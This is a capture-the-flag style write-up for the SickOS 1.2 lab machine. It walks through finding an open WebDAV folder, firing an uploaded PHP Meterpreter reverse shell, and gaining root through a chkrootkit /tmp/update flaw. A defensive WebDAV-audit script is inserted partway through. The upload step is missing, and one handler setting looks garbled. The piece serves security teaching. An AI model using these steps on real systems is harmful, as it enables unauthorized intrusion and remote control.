B2R: SickOSv1.2
Executive Summary
This machine had an unprotected folder that allowed malicious PHP code to be uploaded and then executed remotely. An attacker could use this to obtain an unprivileged shell on the victim machine and explore the system for additional vulnerabilities leading to a full compromise. During that exploration, an outdated version of chkrootkit was found. By exploiting a known vulnerability in the way chkrootkit parses arguments, an attacker could create a malicious file that would later be run by chkrootkit as a fully privileged user.
Tools used
- nmap - discovery
- uniscan - web application scanner
- metasploit - exploit framework
- msfvenom - payload generation
- local-linux-enum script - enumeration
Proof of Concept
In order to cut down on typing, once the IP of the victim computer is discovered, it can be added to /etc/hosts.
echo "192.168.1.188 vm" >> /etc/hosts
We begin with scanning the victim’s machine and find ports 80 and 22.
❯❯ nmap -p - -A vm | tee nmap.scan
Navigating to the page and checking its source code reveals nothing.
Running uniscan discovers a folder named /test.
❯❯ uniscan -qweds -u http://vm/
The directory listing appeared to be empty, but further examination of the /test path revealed that it responded to more than the standard HTTP methods. COPY and MOVE in the OPTIONS response indicated WebDAV.
❯❯ curl -vX OPTIONS vm/test
This path requires no authentication and thus allows attackers to upload files to the web server.
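As an added defensive check (not part of the original writeup), the following script parses a raw OPTIONS response, like the one the curl command above returns, and flags WebDAV write methods that a path offers without an authentication challenge. The two sample responses are constructed, and the script only assumes standard Allow, DAV and WWW-Authenticate headers.

```python
# Added example: audit the raw response to an OPTIONS request for WebDAV
# write methods that the server offers without demanding authentication.

# Methods that let a client create, alter or remove server-side content.
WEBDAV_WRITE_METHODS = {
    "PUT", "DELETE", "COPY", "MOVE", "MKCOL", "PROPPATCH", "LOCK", "UNLOCK",
}


def parse_options_response(raw: str) -> dict:
    """Return the status code and a lower-cased header map of an HTTP response."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    status = int(lines[0].split(" ", 2)[1])
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return {"status": status, "headers": headers}


def audit_webdav(raw: str) -> dict:
    """Report advertised WebDAV write methods and whether the path demanded auth."""
    parsed = parse_options_response(raw)
    allow = parsed["headers"].get("allow", "")
    methods = {m.strip().upper() for m in allow.split(",") if m.strip()}
    write_methods = sorted(methods & WEBDAV_WRITE_METHODS)
    # A 401 status or a WWW-Authenticate challenge means the path is gated.
    requires_auth = parsed["status"] == 401 or "www-authenticate" in parsed["headers"]
    finding = None
    if write_methods and not requires_auth:
        finding = "unauthenticated WebDAV write: " + ",".join(write_methods)
    return {
        "write_methods": write_methods,
        "requires_auth": requires_auth,
        "finding": finding,
    }


# Constructed sample responses (not captured from the target machine).
OPEN_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "DAV: 1,2\r\n"
    "Allow: OPTIONS,GET,HEAD,POST,DELETE,TRACE,PROPFIND,PROPPATCH,COPY,MOVE,LOCK,UNLOCK\r\n"
    "\r\n"
)
PROTECTED_RESPONSE = (
    "HTTP/1.1 401 Unauthorized\r\n"
    'WWW-Authenticate: Digest realm="webdav"\r\n'
    "\r\n"
)
```

Calling audit_webdav(OPEN_RESPONSE) returns a finding listing the write methods, while the protected response yields none; in an audit the same check can be run over each path the scanner discovered.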
Verifying successful upload:
Having uploaded the reverse shell, the Meterpreter handler is constructed
set PAYLOAD php/meterpreter/reverse_tcp
set LHOST 80
run -j
…and the payload is activated.
curl http://vm/test/sshhh.php
Once a shell has been established on the system, an enumeration script reveals what additional vulnerabilities might lead to a full compromise.
The installed version of chkrootkit is outdated and vulnerable to a code execution exploit.
The ExploitDB gives the following description:
Using Metasploit, we create another handler and payload, using the chkrootkit module. This module will create or overwrite the /tmp/update file with the reverse TCP shell of your choosing. The next time chkrootkit is run, this update file will connect back to the attacker computer designated in the payload.
2016-12-20 23:45 -0500